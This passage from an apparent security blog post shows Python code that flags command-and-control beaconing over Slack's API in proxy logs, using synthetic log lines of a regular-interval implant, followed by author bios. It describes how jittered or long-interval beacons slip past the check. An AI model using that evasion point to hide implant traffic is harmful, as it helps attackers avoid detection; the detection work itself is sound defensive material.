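    '2020-06-13T10:00:00 10.1.2.3 slack.com GET /api/conversations.history "python-requests/2.23.0" 1432',
    '2020-06-13T10:01:00 10.1.2.3 slack.com GET /api/conversations.history "python-requests/2.23.0" 1430',
    '2020-06-13T10:01:58 10.1.2.3 slack.com GET /api/conversations.history "python-requests/2.23.0" 1433',
    '2020-06-13T10:03:01 10.1.2.3 slack.com GET /api/conversations.history "python-requests/2.23.0" 1431',
    '2020-06-13T10:04:00 10.1.2.3 slack.com GET /api/conversations.history "python-requests/2.23.0" 1432',
    '2020-06-13T10:05:02 10.1.2.3 slack.com GET /api/conversations.history "python-requests/2.23.0" 1430',
    '2020-06-13T10:05:59 10.1.2.3 slack.com GET /api/conversations.history "python-requests/2.23.0" 1434',
    '2020-06-13T10:07:00 10.1.2.3 slack.com GET /api/conversations.history "python-requests/2.23.0" 1432',
    f'2020-06-13T10:00:00 10.1.2.4 slack.com GET /messages {UA_CHROME} 58211',
    f'2020-06-13T10:00:35 10.1.2.4 slack.com POST /api/chat.postMessage {UA_CHROME} 612',
    f'2020-06-13T10:06:40 10.1.2.4 slack.com GET /files {UA_CHROME} 20933',
    f'2020-06-13T10:06:50 10.1.2.4 slack.com GET /files {UA_CHROME} 1200',
    f'2020-06-13T10:20:00 10.1.2.4 slack.com POST /api/chat.postMessage {UA_CHROME} 640',
    f'2020-06-13T10:20:30 10.1.2.4 slack.com GET /messages {UA_CHROME} 4410',
]


def parse(line):
    """One proxy record; shlex keeps the quoted user-agent as a single field."""
    ts, src, host, method, path, ua, nbytes = shlex.split(line)
    return {"ts": datetime.fromisoformat(ts), "src": src, "host": host,
            "method": method, "path": path, "ua": ua, "bytes": int(nbytes)}


def interval_cv(timestamps):
    """Coefficient of variation of the gaps between requests: near 0 for a
    fixed-sleep beacon, large for a human clicking around."""
    gaps = [(b - a).total_seconds() for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 3 or mean(gaps) == 0:
        return None
    return pstdev(gaps) / mean(gaps)


def find_beacons(lines, min_events=5, max_cv=0.2):
    """Flag (src, host) pairs whose request timing is too regular to be a person."""
    by_pair = defaultdict(list)
    for rec in map(parse, lines):
        by_pair[(rec["src"], rec["host"])].append(rec)
    hits = []
    for (src, host), recs in by_pair.items():
        recs.sort(key=lambda r: r["ts"])
        cv = interval_cv([r["ts"] for r in recs])
        if len(recs) < min_events or cv is None or cv > max_cv:
            continue
        uas = sorted({r["ua"] for r in recs})
        hits.append({"src": src, "host": host, "events": len(recs), "cv": round(cv, 3),
                     "user_agents": uas,
                     # a browser identifies itself as Mozilla/...; an implant often does not
                     "non_browser_client": not all(ua.startswith("Mozilla/") for ua in uas)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(PROXY_LOG):
        print(hit)
```

An operator who jitters the sleep or beacons on a long interval pushes the CV above any sane threshold, so this is one signal, not a verdict: byte-size regularity, off-hours activity, API paths a browser session never calls and volume per workspace token all stack on top of it, and none of them require breaking the TLS.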
Brandon Helms
Brandon Helms currently serves as Rendition Infosec’s Chief Operations Officer and has dedicated most of his career to leading some of the most advanced cyber operations for both the DoD and private sector. Brandon was a Chief Petty Officer in the U.S. Navy where he ran IT and security operations for fast-attack submarines. Afterward, Brandon transitioned into an operator and technical director for the DoD. After his military career, Brandon entered the private sector as a Business Information Security Officer supporting the defense of numerous Nation States and Fortune 100 companies. Today, Brandon focuses most of his attention around exploit development, malware reversing, and training the next generation of cybersecurity professionals. When Brandon is not working, you can find him chillaxin with his daughter in San Antonio or on a mountain somewhere snowboarding.
Daniel Gordon